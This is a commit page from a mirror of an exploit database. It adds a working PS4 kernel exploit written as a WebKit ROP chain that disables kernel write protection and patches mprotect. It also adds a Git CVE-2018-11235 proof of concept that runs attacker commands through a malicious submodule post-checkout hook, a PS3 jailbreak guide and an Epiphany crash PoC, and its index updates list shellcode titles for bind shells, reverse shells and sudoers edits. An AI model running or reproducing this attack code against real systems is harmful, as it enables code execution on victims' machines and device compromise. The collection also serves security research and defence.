bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-06-02

Browse source 
5 changes to exploits/shellcodes

Epiphany 3.28.2.1 - Denial of Service
Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader
Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)
Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)

Git < 2.17.1 - Remote Code Execution

Wordpress Plugin Events Calendar - SQL Injection
WordPress Plugin Events Calendar - SQL Injection

Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)
Linux/x86 - EggHunter + access() Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)
Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)
Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)
Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)
Linux/ARM - Egghunter (\x50\x90\x50\x90) + execve('/bin/sh') Shellcode (32 bytes)
This commit is contained in:
Offensive Security 2018-06-02 05:01:45 +00:00
parent 0f18636d14
commit 22ba7ab5f3
7 changed files with 637 additions and 5 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
exploits/hardware/local/44818.md Normal file
View file

@ -0,0 +1,34 @@
# PS4 5.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on 5.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This exploit also contains autolaunching code for Mira and Vortex's HEN payload. Subsequent loads will launch the usual payload launcher.
This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work.
Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44818.zip
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Payloads included
1) Vortex's HEN (Homebrew Enabler)
2) Mira
## Notes
- The page will crash on successful kernel exploitation, this is normal
## Contributors
Massive credits to the following:
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [Vortex](https://github.com/xvortex)
- [OpenOrbis Team](https://github.com/OpenOrbis/)
- Anonymous

474
exploits/hardware/local/44819.js Normal file
View file

@ -0,0 +1,474 @@
log("--- trying kernel exploit --");
function malloc(sz)
{
var backing = new Uint8Array(0x10000+sz);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz)
{
var backing = new Uint8Array(0x10000+sz*4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
var strcpy_helper = new Uint8Array(0x1000);
var where_writeptr_strcpy = p.leakval(strcpy_helper).add32(0x10);
function strcpy(ptr, str)
{
p.write8(where_writeptr_strcpy, ptr);
for (var i = 0; i < str.length; i++)
strcpy_helper[i] = str.charCodeAt(i) & 0xFF;
strcpy_helper[str.length] = 0;
}
var spawnthread = function(name, chain) {
/*
seg000:00000000007FA7D0 sub_7FA7D0 proc near ; DATA XREF: sub_7F8330+5Eo
seg000:00000000007FA7D0 55 push rbp
seg000:00000000007FA7D1 48 89 E5 mov rbp, rsp
seg000:00000000007FA7D4 41 56 push r14
seg000:00000000007FA7D6 53 push rbx
seg000:00000000007FA7D7 48 89 F3 mov rbx, rsi
seg000:00000000007FA7DA 49 89 FE mov r14, rdi
seg000:00000000007FA7DD 48 8D 35 E5 B3 EC 00 lea rsi, aMissingPlteBef ; "Missing PLTE before tRNS"
-> xref:
seg000:00000000007F8380 48 8D 3D 28 D8 EC 00 lea rdi, a1_5_18_0 ; "1.5.18"
seg000:00000000007F8387 48 8D 15 82 23 00 00 lea rdx, sub_7FA710
seg000:00000000007F838E 48 8D 0D 3B 24 00 00 lea rcx, sub_7FA7D0
seg000:00000000007F8395 31 F6 xor esi, esi
seg000:00000000007F8397 49 C7 47 20 00 00 00 00 mov qword ptr [r15+20h], 0
seg000:00000000007F839F 66 41 C7 47 18 00 00 mov word ptr [r15+18h], 0
seg000:00000000007F83A6 49 C7 47 10 00 00 00 00 mov qword ptr [r15+10h], 0
seg000:00000000007F83AE E8 8D 3C D3 00 call sub_152C040
-> code:
m_png = png_create_read_struct(PNG_LIBPNG_VER_STRING, 0, decodingFailed, decodingWarning);
decodingWarning -> contains Missing PLTE before tRNS
decodingFailed -> contains longjmp
seg000:00000000007FA710 sub_7FA710 proc near ; DATA XREF: sub_7F8330+57o
seg000:00000000007FA710 ; sub_7F9DC0+2Eo
seg000:00000000007FA710 55 push rbp
seg000:00000000007FA711 48 89 E5 mov rbp, rsp
seg000:00000000007FA714 48 8B 35 5D B6 E5 02 mov rsi, cs:qword_3655D78
seg000:00000000007FA71B BA 60 00 00 00 mov edx, 60h ; '`'
seg000:00000000007FA720 E8 AB E6 D2 00 call sub_1528DD0
seg000:00000000007FA725 BE 01 00 00 00 mov esi, 1
seg000:00000000007FA72A 48 89 C7 mov rdi, rax
seg000:00000000007FA72D E8 26 6D 80 FF call sub_1458 < longjmp
seg000:00000000007FA732 0F 0B ud2
seg000:00000000007FA732 sub_7FA710 endp
*/
var longjmp = window.webKitBase.add32(0x14e8);
// ThreadIdentifier createThread(ThreadFunction entryPoint, void* data, const char* name)
/*
seg000:00000000001DD17F 48 8D 15 C9 38 4C 01 lea rdx, aWebcoreGccontr ; "WebCore: GCController"
seg000:00000000001DD186 31 F6 xor esi, esi
seg000:00000000001DD188 E8 B3 1B F9 00 call sub_116ED40
*/
var createThread = window.webKitBase.add32(0x779190);
var contextp = malloc32(0x2000);
var contextz = contextp.backing;
contextz[0] = 1337;
var thread2 = new RopChain();
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
chain(thread2);
p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
p.write8(contextp.add32(0x10), thread2.ropframeptr); // rsp
var retv = function() {p.fcall(createThread, longjmp, contextp, p.sptr(name));}
window.nogc.push(contextp);
window.nogc.push(thread2);
return retv;
}
var fd = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
var fd1 = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
if (fd == (-1 >>> 0))
{
print("kexp failed: no bpf0");
}
var assertcnt = 0;
var assert = function(x)
{
assertcnt++;
if (!x) throw "assertion " + assertcnt + " failed";
}
print("got it");
var bpf_valid = malloc32(0x4000);
var bpf_spray = malloc32(0x4000);
var bpf_valid_u32 = bpf_valid.backing;
var bpf_valid_prog = malloc(0x40);
p.write8(bpf_valid_prog, 0x800/8)
p.write8(bpf_valid_prog.add32(8), bpf_valid)
var bpf_spray_prog = malloc(0x40);
p.write8(bpf_spray_prog, 0x800/8)
p.write8(bpf_spray_prog.add32(8), bpf_spray)
for (var i = 0 ; i < 0x400; )
{
bpf_valid_u32[i++] = 6; // BPF_RET
bpf_valid_u32[i++] = 0;
}
var rtv = p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog);
assert(rtv.low == 0);
print("okay")
var interrupt1, loop1;
var interrupt2, loop2;
var sock = p.syscall(97, 2, 2)
var kscratch = malloc32(0x100);
var start1 = spawnthread("GottaGoFast", function(thread2){
interrupt1 = thread2.ropframeptr;
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["pop rdi"]); // pop rdi
thread2.push(fd); // what
thread2.push(window.gadgets["pop rsi"]); // pop rsi
thread2.push(0x8010427B); // what
thread2.push(window.gadgets["pop rdx"]); // pop rdx
thread2.push(bpf_valid_prog); // what
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr.add32(0x800)); // what
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rdi"]); // pop rdi
var wherep = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["pop rsi"]); // pop rsi
var whatp = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["mov [rdi], rsi"]); // perform write
thread2.push(window.gadgets["pop rsp"]); // pop rdx
loop1 = thread2.ropframeptr.add32(thread2.count*8);
thread2.push(0x41414141); // what
thread2.finalizeSymbolic(wherep, loop1);
thread2.finalizeSymbolic(whatp, loop1.sub32(8));
})
var krop = new RopChain();
var race = new RopChain();
var ctxp = malloc32(0x2000);
var ctxp1 = malloc32(0x2000);
p.write8(bpf_spray.add32(16), ctxp);
var prefaultlist = [];
function pfd(addr)
{
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
p.read4(addr);
return addr;
}
function pf(addr){
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
var ret = addr.add32(0);
while (1)
{
var opcode = (p.read4(ret) & 0xff);
if (opcode == 0xc3)
{
prefaultlist.push(ret);
break;
}
ret.add32inplace(1);
}
return addr;
}
for (var gadgetname in gadgets) {
if (gadgets.hasOwnProperty(gadgetname)) {
if (gadgetname == "stack_chk_fail" || gadgetname == "memset" || gadgetname == "setjmp") continue;
pf(gadgets[gadgetname]);
}
}
/*
67d27: 48 8b 07 mov (%rdi),%rax
67d2a: ff 50 58 callq *0x58(%rax)
12a184d: 48 83 ec 58 sub $0x58,%rsp
12a1851: 89 55 d4 mov %edx,-0x2c(%rbp)
12a1854: 49 89 fd mov %rdi,%r13
12a1857: 49 89 f7 mov %rsi,%r15
12a185a: 49 8b 45 00 mov 0x0(%r13),%rax
12a185e: ff 90 d0 07 00 00 callq *0x7d0(%rax)
6ef2e5: 48 8b 7f 10 mov 0x10(%rdi),%rdi
6ef2e9: ff 20 jmpq *(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
12846b4: 48 8b 77 08 mov 0x8(%rdi),%rsi
12846b8: 48 8b 7f 18 mov 0x18(%rdi),%rdi
12846bc: 48 8b 07 mov (%rdi),%rax
12846bf: ff 50 30 callq *0x30(%rax)
15ca29b: 48 8b 97 b0 00 00 00 mov 0xb0(%rdi),%rdx
15ca2a2: ff 57 70 callq *0x70(%rdi)
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
*/
var ctxp2 = malloc32(0x2000);
var wk2apf = function(off)
{
var addr = window.webKitBase.add32(off);
pf(addr);
return addr;
}
p.write8(ctxp.add32(0x50), 0);
p.write8(ctxp.add32(0x68), ctxp1);
var stackshift_from_retaddr = 0;
p.write8(ctxp1.add32(0x10), wk2apf(0x12a184d));
stackshift_from_retaddr += 8 + 0x58; // call + sub
p.write8(ctxp.add32(0), ctxp2);
p.write8(ctxp.add32(0x10), ctxp2.add32(8));
p.write8(ctxp2.add32(0x7d0), wk2apf(0x6ef2e5))
// rax = ctxp2, rdi = ctxp2 + 8
var iterbase = ctxp2;
for (var i=0; i<0xf; i++)
{
p.write8(iterbase, wk2apf(0x12a184d))
stackshift_from_retaddr += 8 + 0x58; // call + sub
// rax = ctxp2+0x20
p.write8(iterbase.add32(0x7d0+0x20), wk2apf(0x6ef2e5))
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20+8))
iterbase = iterbase.add32(0x20);
}
var raxbase = iterbase;
var rdibase = iterbase.add32(8);
var memcpy = get_jmptgt(webKitBase.add32(0xf8));
memcpy = p.read8(memcpy);
pf(memcpy);
p.write8(raxbase, wk2apf(0x15ca29b))
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x70), wk2apf(0x12846b4)); // next gadget
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x18), rdibase); // rdi
p.write8(rdibase.add32(8), krop.ropframeptr); // rax
p.write8(raxbase.add32(0x30), wk2apf(0xf094a)); // next gadget
p.write8(rdibase, raxbase);
p.write8(raxbase.add32(0x420), wk2apf(0x2728a1)); // next gadget
p.write8(raxbase.add32(0x40), memcpy.add32(0xc2-0x90)); // next gadget (memcpy skipping prolog)
var topofchain = stackshift_from_retaddr + 0x28 ;
p.write8(rdibase.add32(0xb0), topofchain); // rdx
for (var i = 0; i < 0x1000/8; i++)
{
p.write8(krop.ropframeptr.add32(i*8), window.gadgets["ret"]);
}
krop.count = 0x10;
/*
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
55566f: 48 01 c7 add %rax,%rdi
555672: 48 89 f8 mov %rdi,%rax
555675: c3 retq
46ef9: 48 8b 07 mov (%rdi),%rax
46efc: c3 retq
1520c6: 48 01 f0 add %rsi,%rax
1520c9: c3 retq
14536b: 48 89 07 mov %rax,(%rdi)
14536e: c3 retq
1570a1f: 48 21 f0 and %rsi,%rax
1570a22: c3 retq
353a71: 48 89 c2 mov %rax,%rdx
353a74: c3 retq
1cee60: 48 89 d0 mov %rdx,%rax
1cee63: c3 retq
15a3faf: 48 89 c7 mov %rax,%rdi
15a3fb2: c3 retq
6c83a: 48 8b 00 mov (%rax),%rax
6c83d: c3 retq
295dbe: ff e7 jmpq *%rdi
*/
p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
p.write8(kscratch.add32(0x18), kscratch);
function set_rdi_rbpoff() {
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(kscratch.add32(0x18)); // what
krop.push(wk2apf(0xf094a)); // rbp = rsp
var rbp_off = topofchain - krop.count*8 + 0x28;
krop.push(wk2apf(0x2728a1)); // rbp = rsp
return rbp_off;
}
function add_to_rdi(imm)
{
krop.push(window.gadgets["pop rax"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x55566f)); // rbp = rsp
}
var rboff = set_rdi_rbpoff();
add_to_rdi(rboff);
var add_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rsi
krop.push(imm); // what
krop.push(wk2apf(0x1520c6)); // add rsi to rax
}
krop.push(wk2apf(0x46ef9)); // deref rdi in rax
add_rax(0x2fa); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
var shellbuf = malloc32(0x1000);
var write_rax = function(addr)
{
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(addr); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
}
var load_rax = function(addr)
{
krop.push(window.gadgets["pop rax"]); // pop rax
krop.push(addr); // what
krop.push(wk2apf(0x6c83a)); // deref rax
}
var and_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x1570a1f)); // and rax to rdi
}
var rax_to_rdx = function()
{
krop.push(wk2apf(0x353a71)); // rax to rdx
}
var rdx_to_rax = function()
{
krop.push(wk2apf(0x1cee60)); // rdx to rax
}
var rax_to_rdi = function()
{
krop.push(wk2apf(0x15a3faf)); // rax to rdi
}
var write_to_rax64 = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(window.gadgets["mov [rax], rsi"]); // pop rdi
}
write_rax(kscratch); // save address in usermode
add_rax(0xc54b4)
write_rax(kscratch.add32(8)); // save address
krop.push(wk2apf(0x82)); // jmp rax
write_rax(kscratch.add32(16)); // save cr0
and_rax(new int64(0xfffeffff,0xffffffff)); // unset bit
rax_to_rdx();
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
rdx_to_rax();
krop.push(wk2apf(0x295dbe)); // jmp rdi
/*
Write Anywhere mode
*/
load_rax(kscratch);
add_rax(0x3609a);
krop.push(wk2apf(0x6c83a)); // deref rax
write_rax(kscratch.add32(0x330)); // rando offset lol
// put patches here. example is mprotect patch
load_rax(kscratch);
add_rax(0x3609a);
write_to_rax64(new int64(0x9090FA38,0x90909090)); // patch mprotect
/*
Disable Write Anywhere mode
*/
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
load_rax(kscratch.add32(16))
krop.push(wk2apf(0x295dbe)); // jmp rdi
krop.push(wk2apf(0x5cdb9));
krop.push(kscratch.add32(0x1000));

23
exploits/hardware/local/44820.txt Normal file
View file

@ -0,0 +1,23 @@
EDB Note ~ http://ps3xploit.com/help/dumper.html
EDB Download ~ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44820.zip
## Dumper Help
**Warning**:
Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despite an operation failure. For instance, if you choose a path where no device is plugged in, a dumper page will still display a success message despite the fact the dump save could not work. This limitation has already been addressed, the added operation checks will be part of an update to these PS3Xploit tools which will be released in the coming weeks, that update will be final, no more will come after it.
## PLEASE READ FIRST:
- For best results with the flash dumper, here are the recommended steps.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
- Press the exploit initialization button & wait until initialization succeeds. If it fails, follow the refresh/reload instructions on screen.
- Trigger the exploit.
- On success, check your dump with the py checker tool.
## Usage Tips:
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.

54
exploits/linux/remote/44822.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Git (code execution)
# Date: 2018-05-29
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage: https://github.com/git/git <https://github.com/git/git>
# CVE: CVE-2018-11235
#Version: <=2.17.1
# Tested on Kali Linux
P0C:
Create two files:
pwned.sh: the file which will contain our commands to be executed
commit.sh the fole which contain a normal build with a bit of calls to our pwned.sh file
add the follwing to Pwned.sh:
#!/bin/sh
cat << EOF
#here we can put our lovely commands
Exploited! : $(ifconfig)
EOF
#--------
Add the follwing to commit.sh file:
#!/bin/sh
set -e
repo_dir="$PWD/repo"
#change it to any other Repo
repo_submodule='https://github.com/JameelNabbo/SmartWorm'
git init "$repo_dir"
cd "$repo_dir"
git submodule add "$repo_submodule" pwned
mkdir modules
cp -r .git/modules/pwned modules
cp ../pwned.sh modules/pwned/hooks/post-checkout
git config -f .gitmodules submodule.pwned.update checkout
git config -f .gitmodules --rename-section submodule.pwned submodule.../../modules/pwned
git add modules
git submodule add "$repo_submodule"
git add SmartWorm
git commit -am pwned
echo "All done, now \`git clone --recurse-submodules \"$repo_dir\" dest_dir\`”
——————
Solution:
https://www.edwardthomson.com/blog/upgrading_git_for_cve2018_11235.html

42
exploits/multiple/dos/44821.txt Normal file
View file

@ -0,0 +1,42 @@
Summary:
ephy-session.c in libephymain.so in GNOME Web (aka Epiphany) through 3.28.2.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that triggers access to a NULL URL, as demonstrated by a crafted window.open call, CVE-2018-11396 was assigned to this issue.
PoC:
<script>
win = window.open("hello world");
</script>
Stack trace:
ftw@ftw-box:~$ gdb epiphany
(gdb) run
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08bc700 (LWP 2279)]
[New Thread 0x7fffdee51700 (LWP 2280)]
[New Thread 0x7fffde650700 (LWP 2281)]
[New Thread 0x7fffdcdd5700 (LWP 2282)]
[New Thread 0x7fffd7fff700 (LWP 2283)]
[New Thread 0x7fffd77fe700 (LWP 2284)]
[New Thread 0x7fffd6ffd700 (LWP 2285)]
[New Thread 0x7fffd67fc700 (LWP 2286)]
[New Thread 0x7fffd5b8c700 (LWP 2287)]
[New Thread 0x7fffd538b700 (LWP 2288)]
[New Thread 0x7fff8f486700 (LWP 2294)]
[New Thread 0x7fff8da1e700 (LWP 2304)]
[New Thread 0x7fff8d21d700 (LWP 2305)]
[New Thread 0x7fff8ea7f700 (LWP 2315)]
[Thread 0x7fffd5b8c700 (LWP 2287) exited]
[Thread 0x7fffd67fc700 (LWP 2286) exited]
Thread 15 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff8ea7f700 (LWP 2315)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc246db in start_thread (arg=0x7fff8ea7f700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)

7
files_exploits.csv
View file

@ -5985,6 +5985,7 @@ id,file,description,date,author,type,platform,port
44768,exploits/php/dos/44768.txt,"Symfony 2.7.0 < 4.0.10 - Denial of Service",2018-05-26,"Federico Stange",dos,php,
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9751,6 +9752,9 @@ id,file,description,date,author,type,platform,port
44797,exploits/linux/local/44797.txt,"GNU Barcode 0.99 - Buffer Overflow",2018-05-29,LiquidWorm,local,linux,
44798,exploits/linux/local/44798.txt,"GNU Barcode 0.99 - Memory Leak",2018-05-29,LiquidWorm,local,linux,
44806,exploits/linux/local/44806.txt,"Procps-ng - Multiple Vulnerabilities",2018-05-30,"Qualys Corporation",local,linux,
44818,exploits/hardware/local/44818.md,"Sony Playstation 4 (PS4) 5.07 - 'Jailbreak' WebKit / 'bpf v2' Kernel Loader",2018-05-28,Specter,local,hardware,
44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16535,6 +16539,7 @@ id,file,description,date,author,type,platform,port
44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39461,7 +39466,7 @@ id,file,description,date,author,type,platform,port
44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
44783,exploits/php/webapps/44783.txt,"DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
44785,exploits/php/webapps/44785.txt,"Wordpress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
44785,exploits/php/webapps/44785.txt,"WordPress Plugin Events Calendar - SQL Injection",2018-05-28,AkkuS,webapps,php,
44786,exploits/php/webapps/44786.txt,"Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection",2018-05-28,L0RD,webapps,php,
44788,exploits/php/webapps/44788.html,"Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,
44789,exploits/php/webapps/44789.html,"Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery",2018-05-28,L0RD,webapps,php,

Can't render this file because it is too large.

8
files_shellcodes.csv
View file

@ -872,7 +872,7 @@ id,file,description,date,author,type,platform
42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - Egghunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44445,shellcodes/generator/44445.py,"Linux/x64 - x64 Assembly Shellcode (Generator)",2018-04-11,0x4ndr3,shellcode,generator
44505,shellcodes/linux_x86/44505.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 bytes)",2018-04-24,"Anurag Srivastava",shellcode,linux_x86
44507,shellcodes/linux_x86/44507.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access + Null-Free Shellcode (79 bytes)",2018-04-24,absolomb,shellcode,linux_x86
@ -888,6 +888,6 @@ id,file,description,date,author,type,platform
44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86
44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86
44791,shellcodes/linux_x86/44791.c,"Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)",2018-05-28,Luca,shellcode,linux_x86
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - EggHunter + access() Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter + /bin/sh Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
44807,shellcodes/linux_x86/44807.c,"Linux/x86 - Egghunter (0xdeadbeef) + access() + execve(/bin/sh) Shellcode (38 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
